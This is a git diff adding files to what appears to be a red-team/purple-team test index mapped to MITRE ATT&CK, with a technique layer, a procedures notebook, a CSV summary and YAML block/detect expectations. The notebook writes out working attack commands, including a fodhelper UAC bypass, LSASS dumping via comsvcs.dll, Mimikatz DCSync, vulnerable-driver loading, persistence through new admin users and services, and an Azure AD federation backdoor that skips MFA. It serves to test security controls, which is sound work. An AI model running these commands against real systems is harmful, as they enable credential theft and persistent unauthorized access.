+            "techniqueID": "T1583.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1594"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1597"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1597.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1597.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1599"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1599.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1600"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1600.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1600.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1601"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1601.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1601.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1602"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1602.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1602.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1606"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1606.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1606.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1609"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1610"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1611"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1612"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1613"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1614"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1614.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1615"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1619"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1620"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1621"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1622"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1647"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1648"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1649"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1650"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1651"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1652"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1653"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1654"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1656"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1657"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1659"
+        }
+    ]
+}
\ No newline at end of file
diff --git a/rh-index-2024/rh-index-2024-v1.0-notebook.md b/rh-index-2024/rh-index-2024-v1.0-notebook.md
new file mode 100644
index 0000000..938c570
--- /dev/null
+++ b/rh-index-2024/rh-index-2024-v1.0-notebook.md
@@ -0,0 +1,425 @@
+# General
+
+# Initial Access
+
+## MFA Push Spam - General guidance
+
+Push-based MFA systems are susceptible to abuse by attackers because they allow an attacker to send a large volume of MFA requests to a user in order to induce that user to accept the prompt in the hopes it ends the requests.
+
+Spam a target user with MFA approval prompts. Unlike a real-world scenario, this is not meant to test the human response to being inundated with MFA requests but rather the technical security controls for such a situation.
+
+### Guidance
+
+Send at least 10 MFA requests to the target user
+
+### Notes
+
+- If MFA is in place, but it does not use some form of zero-knowledge approval (e.g. push notification accept, SMS accept, etc), then it should be considered a block. For example, if the MFA systems requires entering a one-time code, then it would not be susceptible to this attack and therefore be blocked. If no MFA is enforced, it should be considered not blocked.
+
+## Malicious ISOs - Generic ISO-wrapped payload
+
+ISO archives can be used to deliver malicious payloads while bypassing mark-of-the-web restrictions
+
+Use an ISO to deliver a malicious executable payload
+
+### Prerequisites
+
+1. Payload
+1. ISO containing the payload 
+   1. You can use `mkisofs` to create an ISO:
+   ```
+   bash> mkisofs -J -o {{ iso }} {{ payload }}
+   ```
+
+## Suspicious connections - General guidance
+
+### Guidance
+
+When using a browser, you can override the user agent string by using an extension. For example:
+
+- Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher
+- Chrome: https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg
+
+You can override your source IP by using a VPN running on a VPS hosted in an anomalous geolocation.
+
+## Suspicious connections - General guidance
+
+### Guidance
+
+When using a browser, you can override the user agent string by using an extension. For example:
+
+- Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher
+- Chrome: https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg
+
+You can override your source IP by using a VPN running on a VPS hosted in an anomalous geolocation.
+
+# Execution
+
+# Defense Evasion
+
+## Malicious kernel driver use - load known-abusable driver
+
+Kernel drivers can be used by attackers for a number of malicious activities, including hiding artifacts and tampering with endpoint security tools.
+
+This bypasses the need for attackers to retrieve legitimate code-signing certificates for a driver they wrote.
+
+### Prerequisites
+
+- Local admin
+- A known-abusable driver. Examples: 
+  - **DBUtil_2_3 (SHA256 - 0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5)**
+  - RTCore64 (SHA256 - 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd)
+  - IQVM64 (SHA256 - 4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b)
+
+### Guidance
+
+Example loading using sc.exe
+
+```
+cmd> sc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\windows\System32\Drivers\{{ sys_file }} displayname= {{ name }}
+```
+
+### Cleanup
+
+- Is using sc.exe, stop and delete the service then restart the machine
+
+### Notes
+
+Drivers can be found in multiple places, including:
+
+- Directly from vendor sites
+- VirusTotal
+- Aggregators like LOLDrivers and KDU
+  - LOLDrivers: https://github.com/magicsword-io/LOLDrivers/tree/main/drivers
+  - KDU: https://github.com/hfiref0x/KDU/
+
+## DLL Side Loading - General guidance
+
+### Notes
+
+- For an up-to-date list of side-loadable DLLs, refer to https://hijacklibs.net/
+
+## DLL Search Order Hijacking - MpCmdRun.exe sideloading
+
+MpCmdRun.exe is susceptible to a DLL sideloading hijack via its dependency on MpClient.dll
+
+### Prerequisites
+
+- A DLL with the appropriate exports called `mpclient.dll`
+  - Use: https://github.com/2XXE-SRA/payload_resources/tree/master/dllsideload/mpclient
+
+### Guidance
+
+Copy `c:\program files\windows defender\mpcmdrun.exe` to the same directory as the `mpclient.dll` payload then run `mpcmdrun.exe`
+
+## UAC Bypass - via fodhelper.exe
+
+User Account Control is not a security control but can cause issues with execution when attempting privileged operations
+
+Move to a high-integrity execution context via fodhelper.exe and a Registry modification. Fodhelper.exe is one of many unpatched methods for bypassing UAC.
+
+### Prerequisites
+
+- Split-token admin account
+
+### Guidance
+
+Check for the existence of the target registry key. If it exists, note the value so that it can be restored after execution.
+
+```
+cmd> reg query HKCU\Software\Classes\ms-settings\Shell\Open\command
+```
+
+Modify the registry key and execute fodhelper.exe to obtain an elevated command prompt:
+
+```
+cmd> 
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+c:\windows\system32\fodhelper.exe
+```
+
+### Cleanup
+
+If the registry existed prior to execution, restore its value:
+
+```
+cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v {{ initial_command }} /f
+```
+
+Otherwise, delete the key:
+
+```
+cmd> reg delete HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+```
+
+### References
+
+- https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+- https://4pfsec.com/offensive-windows-fodhelper-exe/
+
+## Conditional Access Policy Modifications - General guidance
+
+### Notes
+
+- Create a new conditional access policy to avoid modifying production policies. Additionally, consider disabling the policy or setting it to report-only before modifying it. 
+
+# Discovery
+
+# Command and Control
+
+## Remote Assistance Software - General guidance
+
+Access via remote assistance software
+
+Select and use a well-known remote assistance software
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+   1. TeamViewer: https://www.teamviewer.com/
+   2. GoTo Resolve: https://www.goto.com/it-management/resolve
+   3. ConnectWise Control: https://control.connectwise.com/
+
+### Notes
+
+- Where possible, use remote assistance software already in use in the environment
+
+## Remote tool download - General guidance
+
+Transfer tool into environment by downloading from the Internet
+
+### Notes
+
+- The maliciousness level of the binary should align with the intent of the test. For testing signature-based checks, use a known malicious tool, such as Mimikatz. For testing sandboxing or similar network security technologies, use an unknown yet still overtly malicious tool, such as one built around the current attack infrastructure. By default, start with the most malicious choice.
+
+# Collection
+
+# Credential Access
+
+## DCSync - via Mimikatz
+
+The DCSync attack mimics normal replication behavior between DCs, allowing for remote extraction of credentials
+
+Uses Mimikatz's lsadump::dcsync command
+
+### Prerequisites
+
+- Command execution in the context of an account with Active Directory replication rights
+- User accounts to target
+- Mimikatz binary (https://github.com/gentilkiwi/mimikatz)
+
+### Guidance
+
+```
+mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ target_username }}
+```
+
+### Troubleshooting
+
+If Mimikatz is giving an error of `ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)`, try the following:
+
+```
+cmd> klist purge
+cmd> gpupdate /force
+```
+
+## LSASS dumping using comsvcs.dll - via rundll32.exe
+
+Use `rundll32.exe` to call the `MiniDump` export from `comsvcs.dll`
+
+### Prerequisites
+
+- Administrator rights
+- SeDebugPrivilege
+
+### Guidance
+
+```
+shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full
+```
+
+This command must be run from a shell process that has `SeDebugPrivilege` enabled. 
+PowerShell should work to this end. 
+
+You can acquire `SeDebugPrivilege` for `cmd.exe` by launching it as `SYSTEM` via Sysinternals' `PsExec` (`psexec -sid cmd`). 
+Alternatively, you can use the VBScript file from `modexp`: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ (`cscript procdump.vbs lsass.exe`)
+
+### Cleanup
+
+- Delete the dump file
+
+# Impact
+
+## GPO Modifications - General guidance
+
+### Notes
+
+- Create a new group policy object to avoid modifying production policies. Additionally, consider disabling the policy before modifying it. 
+
+# Exfiltration
+
+## DLP Test - General use
+
+DLP Test (dlptest.com) is a web utility for testing if exfiltration of sensitive data is successful
+
+General usage notes for DLP Test
+
+### Notes
+
+- If sample sensitive data is needed, the site provides it in different types and formats
+- The site supports HTTP, HTTPS, and FTP
+- Do not upload actual sensitive data to the site
+
+## Exfiltration to cloud storage - General guidance
+
+Select and use a well-known cloud storage service
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+   1. Generic: https://rclone.org/downloads/
+   2. MEGA: https://mega.io/desktop
+   3. Dropbox: https://www.dropbox.com/install
+
+### Notes
+
+- Where possible, use cloud storage service already in use in the environment
+
+# Lateral Movement
+
+# Persistence
+
+## Scheduled Task Persistence - via schtasks.exe
+
+Use built-in schtasks.exe to persist by creating a scheduled task
+
+### Guidance
+
+```
+CMD> schtasks /Create /SC DAILY /TN "{{ taskname }}" /TR "{{ command }}" /ST 09:00
+```
+
+### Cleanup
+
+```
+CMD> schtasks /delete /tn "{{ taskname }}" /f
+```
+
+## Windows Service Persistence - via sc.exe
+
+Use built-in sc.exe to persist
+
+### Guidance
+
+```
+CMD> sc create {{ service_name }} binPath= "{{ command }}"
+```
+
+### Cleanup
+
+```
+CMD> sc delete {{ service_name }}
+```
+
+## New user persistence - via net.exe
+
+Use built-in net.exe to persist by creating a new local administrator user
+
+### Guidance
+
+```
+CMD> net user /add {{ username }} {{ password }}
+CMD> net localgroup {{ group_name }} {{ username }} /add
+```
+
+### Cleanup
+
+```
+CMD> net user /delete {{ username }}
+```
+
+## Persistence in Azure AD - Register a New Device
+
+Register a new device in Azure AD
+
+### Prerequisites
+
+- Azure AD credentials
+- AAD Internals PowerShell module (https://aadinternals.com/aadinternals/#installation)
+  - Install: `PS> install-module aadinternals -scope currentuser`
+  - Import: `PS> import-module aadinternals`
+
+### Guidance
+
+Authenticate to Azure AD and save the token
+
+```
+PS> Get-AADIntAccessTokenForAADJoin -SaveToCache
+```
+
+Register a device: 
+
+```
+PS> Join-AADIntDeviceToAzureAD -DeviceName "{{ device_name }}" -DeviceType "{{ device_type }}" -OSVersion "{{ os_version }}" -JoinType Register
+```
+
+  - This will save a `.pfx` certificate to the current working directory, which is needed for cleanup
+  - Note: The provided values do not need to refer to real characteristics
+
+### Cleanup
+
+Remove the device from Azure AD 
+
+```
+PS> Remove-AADIntDeviceFromAzureAD -PfxFileName {{ pfx_certificate_file }}
+```
+
+## Azure AD Domain Federation - Backdoor via AADInternals
+
+Use AADInternals to create a backdoor federation domain for persisting access to an environment.
+
+### Prerequisites
+
+- Permissions to modify domain authentication settings
+  - and an access token for the user with these permissions, referred to as `$at` in example commands. To retrieve a token, use `$at=Get-AADIntAccessTokenForAADGraph -Credentials (get-credential)` and proceed through the prompts
+- AADInternals installed
+  - `Install-Module AADInternals`
+- A target verified domain in Azure AD
+  - To add a domain, Go to Azure AD -> custom domain names -> add -> set the provided DNS records for your domain -> wait for the verification to compelete
+- A user with an immutable ID set
+  - To set an immutable ID for a user: `Set-AADIntUser -UserPrincipalName {{ upn_or_email }} -ImmutableId "{{ id }}" -AccessToken $at` where the `id` is an arbitrary unnique value
+
+### Guidance
+
+To set the backdoor 
+
+```
+PS> ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "{{ domain }}"
+```
+
+To use the backdoor. This works for any user in the tenant, regardless of their domain.
+
+```
+Open-AADIntOffice365Portal -ImmutableID {{ id }} -UseBuiltInCertificate -ByPassMFA $true -Issuer {{ issuer }}
+```
+
+- `id` is the immutable ID of the target user
+- `issuer` is the IssuerUri provided in the output of the previous command 
+
+### Cleanup
+
+- Delete the domain
+
+### Notes
+
+- The domain must be verified for the backdoor to work
+
+### References
+
+- https://o365blog.com/post/aadbackdoor/
+- https://www.mandiant.com/resources/blog/detecting-microsoft-365-azure-active-directory-backdoors
+
diff --git a/rh-index-2024/rh-index-2024-v1.0-summary.csv b/rh-index-2024/rh-index-2024-v1.0-summary.csv
new file mode 100644
index 0000000..846aebf
--- /dev/null
+++ b/rh-index-2024/rh-index-2024-v1.0-summary.csv
@@ -0,0 +1,51 @@
+"Test Case","MITRE ID","Campaign","Description"
+"Prompt a user with multiple MFA requests","T1621","Initial Access","Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt."
+"Attachment - ISO","T1566.001","Initial Access","Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions."
+"Attachment - Zipped macro","T1566.001","Initial Access","Send a malicious macro-enabled Office document in a ZIP archive to a target user in an email."
+"Suspicious external employee login","T1078","Initial Access","Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt."
+"Suspicious service use","T1078","Initial Access","Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service."
+"Macro - Remote Template","T1221","Execution","Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document"
+"Load known-abusable kernel driver","T1014","Defense Evasion","Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes."
+"Sideload a DLL into a legitimate application","T1574.002","Defense Evasion","Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application."
+"DLL execution using Rundll32","T1218.011","Defense Evasion","Execute a malicious DLL's function directly using rundll32"
+"Bypass User Account Control (UAC) via fodhelper","T1548.002","Defense Evasion","Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification"
+"Clear Windows Event Log entries","T1070.001","Defense Evasion","Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs."
+"Certutil decode Base64 encoded payload","T1140","Defense Evasion","Use certutil.exe to decode an encoded payload file"
+"Disable Windows Defender via PowerShell","T1562.001","Defense Evasion","Use PowerShell's Set-MpPreference to disable Windows Defender"
+"Modify identity policy in IdP","T1484","Defense Evasion","Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement."
+"Domain Controller discovery via nltest","T1018","Discovery","Use nltest.exe to identify domain controllers in the domain"
+"Domain trust discovery via nltest","T1482","Discovery","Identify domain trust relationships using nltest.exe"
+"Internal network scan using Net Scan","T1046","Discovery","Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect"
+"Enumerate domain groups and users using net","T1087.002","Discovery","Enumerate domain users and domain groups using the builtin net.exe"
+"BloodHound DC enumeration","T1087.002","Discovery","Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller"
+"Retrieve system information","T1082","Discovery","Retrieve information about the system using multiple builtin commands"
+"HTTP C2 over tcp/80","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP"
+"HTTPS C2 over tcp/443","T1071.001","Command and Control","Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS"
+"Access via remote assistance tool","T1219","Command and Control","Establish connection to system using a legitimate remote assistance application"
+"Remote tool download over HTTP","T1105","Command and Control","Download a tool from a public hosting location onto the victim system"
+"Screen Capture","T1113","Collection","Capture an image of the user's screen"
+"Keylogger","T1056.001","Collection","Log user keystrokes"
+"Extract domain user credentials via replication","T1003.006","Credential Access","Replicate a user's hash from a domain controller using replication APIs (DCSync)."
+"Extract Logonpasswords via Nanodump","T1003.001","Credential Access","Use nanodump to extract credentials from LSASS process memory"
+"Dump LSASS memory using builtin comsvcs.dll","T1003.001","Credential Access","Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk"
+"Dump LSASS memory using Sysinternals ProcDump","T1003.001","Credential Access","Use ProcDump from Sysinternals to dump LSASS process memory"
+"Extract browser cookies","T1555.003","Credential Access","Extract cookie information from the user's browser"
+"Volumetric Kerberoasting","T1558.003","Credential Access","Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set"
+"Enabled WDigest via Registry","T1112","Credential Access","Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory"
+"Encrypt a large amount of files","T1486","Impact","Encrypt a large amount of files on the endpoint to simulate ransomware"
+"Delete shadows with vssadmin.exe","T1490","Impact","Delete volume shadow copies on the host to inhibit file system recovery"
+"Modify group policy object","T1484.001","Impact","Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems."
+"Extract sensitive data over HTTP","T1048.003","Exfiltration","Extract data from the network over HTTP tcp/80 to an external host or IP."
+"Extract sensitive data over FTP","T1048.003","Exfiltration","Exfiltrate data from the internal network to an external system via FTP"
+"Extract data to cloud storage service","T1567.002","Exfiltration","Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box"
+"Extract sensitive data over HTTP C2","T1041","Exfiltration","Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP"
+"Lateral Movement via WMI","T1021.003","Lateral Movement","Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system"
+"Lateral Movement via PsExec","T1021.002","Lateral Movement","Move to another system by creating a service remotely via Sysinternals PsExec"
+"Lateral Movement via RDP","T1021.001","Lateral Movement","Perform an interactive logons to a Windows system via RDP"
+"Remote .exe copy","T1570","Lateral Movement","Copy an .exe payload to a temp folder on the remote target"
+"Persist via new scheduled task","T1053.005","Persistence","Persist on a system by creating a new scheduled task"
+"Persist via new Windows service","T1543.003","Persistence","Persist on a system by creating a new service"
+"Persist via Registry Winlogon Shell","T1547.004","Persistence","Run a payload during user login by setting a Registry Winlogon key"
+"Persist via new local administrator","T1136.001","Persistence","Create a new local user then add them to the ""Administrators"" group using the builtin net.exe"
+"Register a new device in Azure AD","T1098.005","Persistence","Register a new device in Azure AD"
+"Configure a custom federated domain","T1484.002","Persistence","Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant."
diff --git a/rh-index-2024/rh-index-2024-v1.0.yml b/rh-index-2024/rh-index-2024-v1.0.yml
new file mode 100644
index 0000000..620c606
--- /dev/null
+++ b/rh-index-2024/rh-index-2024-v1.0.yml
@@ -0,0 +1,1020 @@
+Initial Access:
+- name: Prompt a user with multiple MFA requests
+  description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt.
+  platforms:
+  guidance:
+  block:
+  - Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint
+  detect:
+  - Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour).
+  controls:
+  - IdP
+  metadata:
+    id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+    tid: T1621
+    tactic: TA0006
+    x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+    isv: 1
+- name: Attachment - ISO
+  description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+  platforms:
+  guidance:
+  - PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+  block:
+  - Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+  detect:
+  - Malicious email alerted on by email gateway
+  controls:
+  - Mail Gateway
+  metadata:
+    id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+    tid: T1566.001
+    tactic: TA0001
+    x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+    isv: 1
+- name: Attachment - Zipped macro
+  description: Send a malicious macro-enabled Office document in a ZIP archive to a target user in an email.
+  platforms:
+  guidance:
+  - PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+  block:
+  - Malicious email blocked/quarantined or attachment inside email stripped by email gateway
+  detect:
+  - Malicious email alerted on by email gateway
+  controls:
+  - Mail Gateway
+  metadata:
+    id: 97f1da56-79a3-4181-a491-8de9f93b05af
+    tid: T1566.001
+    tactic: TA0001
+    x_vectr_id: 97f1da56-79a3-4181-a491-8de9f93b05af
+    isv: 1
+- name: Suspicious external employee login
+  description: Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt.
+  platforms:
+  guidance:
+  block:
+  - Suspicious logins originating from select geolocations are blocked
+  detect:
+  - Baseline login events for users using authentication logs then generate alerts for instances where the logins occur from comparatively anomalous geolocations
+  controls:
+  - SIEM
+  - IdP
+  metadata:
+    id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+    tid: T1078
+    tactic: TA0001
+    x_vectr_id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+    isv: 1
+- name: Suspicious service use
+  description: Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service.
+  platforms:
+  guidance:
+  block:
+  - ''
+  detect:
+  - Baseline application use for users using application logs then generate alerts for instances where the usage occurs from comparatively anomalous geolocations
+  controls:
+  - SIEM
+  metadata:
+    id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+    tid: T1078
+    tactic: TA0001
+    x_vectr_id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+    isv: 1
+Execution:
+- name: Macro - Remote Template
+  description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document
+  platforms:
+  - windows
+  guidance:
+  block:
+  - Macro execution is blocked by GPO policy
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  - Payload on disk deleted/quarantined by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
